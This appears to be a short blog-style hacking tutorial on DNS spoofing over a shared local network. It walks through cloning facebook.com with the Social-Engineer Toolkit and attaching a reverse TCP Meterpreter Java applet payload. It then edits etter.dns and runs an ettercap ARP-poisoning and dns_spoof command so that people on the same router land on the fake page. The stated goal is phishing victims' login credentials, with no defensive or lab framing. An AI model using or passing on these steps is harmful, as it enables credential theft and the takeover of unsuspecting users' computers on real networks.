DNS Spoffing [Man in middle attack ]
What Is Dns Spoofing?
DNS spoofing is an attack that can categorize under Man-In-The-Middle-Attack, beside DNS Spoofing MIMA contain:
-ARP poisoning
-Sessions hijacking
-SSL hijacking
-DNS Spoofing
I will only be showing you DNS Spoofing , For now .. !
How does it work ?
Man in the middle attack means that the hacker will clone a specific web site such as facebook.com/twitter/google etc.... and force the victim to enter his cloned page , And phishe his login creedintals ... ( this only works on ur local connection ) Like , You can phishe People on the same router.
REQUIREMENTS :
1-Linux operating system ( IMPORTANT )
2-Basic knowledge with Linux commands ( Important )
3-A brain ( SUPEREME INPORTANT)
Steps:
1-Setting Java applet attack / Clonning a specific web site " Ill clone facebook.com "
2-Setting the DNS spoofing blugin useing ettercap
First off:
We will open a terminal And type in
cd /pentest/exploits/set
Then
./SET
Now we will get our exploit on and running , Now we are going to choose it like so :
WebSite attack vectors/Java applet attack method /Clone web site / Enter the web site u want to clone ..
Then after it finish clonning , Use the
TCP reverse meter preter payload
Then we will use the following exploits : shikata_ga_nai
Insert an opened port after that ...
It will ask you to
create a Linux/OSX reverse_tcp meterpreter Java Applet payload also?
And we will type "no"
Then we are done for the java applet setting ....
Now comes the reall hacking
Open a new terminal and type
locate etter.dns
Then it will show u a directory of the tool
nano <Directory of the tool>
Without the <> ofc.
Now it will load the tool , We will scroll down till we see
3 lines with microsoft.com
Change them all to facebook.com without removed the *. in the 2nd line
And without closing this terminal , We will open a new one , And type
ifconfig
Now we will copy our local addrress its usually like
192.168.2.xxx
And ofc we will replace it with the ip's infront of the 3 lines of microsoft.com
Now we will press CTRL+O and type y And then y again untill it says
xx lines wrote
Then we will press CTRL+X
Then we will execute what we have done useing
ettercap -T -q -i eth0 -P dns_spoof -M arp // //
Then it will load our Etter cap Wink and then It will tell you
facebook.com spoofed to [192.168.2.xx]
Now every one on ur own local connection Visits facebook.com
and insert his infoz and login , You will be informated with the login infoz Wink.
Post a Comment